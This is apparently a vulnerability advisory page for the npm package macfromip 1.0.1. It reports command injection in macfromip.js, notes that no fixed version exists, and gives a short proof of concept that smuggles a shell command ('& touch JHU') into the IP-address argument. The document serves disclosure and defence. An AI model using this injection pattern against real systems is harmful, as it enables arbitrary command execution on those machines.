macfromip@1.0.1 vulnerabilities

On given an IP Address, will attempt to identify that IP's MAC address.

Direct Vulnerabilities

Known vulnerabilities in the macfromip package. This does not include vulnerabilities belonging to this package’s dependencies.

Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.
Fix for free
Vulnerability Vulnerable Version
  • C
Command Injection

macfromip is a module that gets a MAC address from a LAN IP address

Affected versions of this package are vulnerable to Command Injection. The injection points are located in lines 66 and 96 in macfromip.js.

PoC

var a = require("macfromip");
a.getMacInLinux("& touch JHU", function(){});
a.getMacInWin32("& touch JHU2 &", function(){});

How to fix Command Injection?

There is no fixed version for macfromip.

*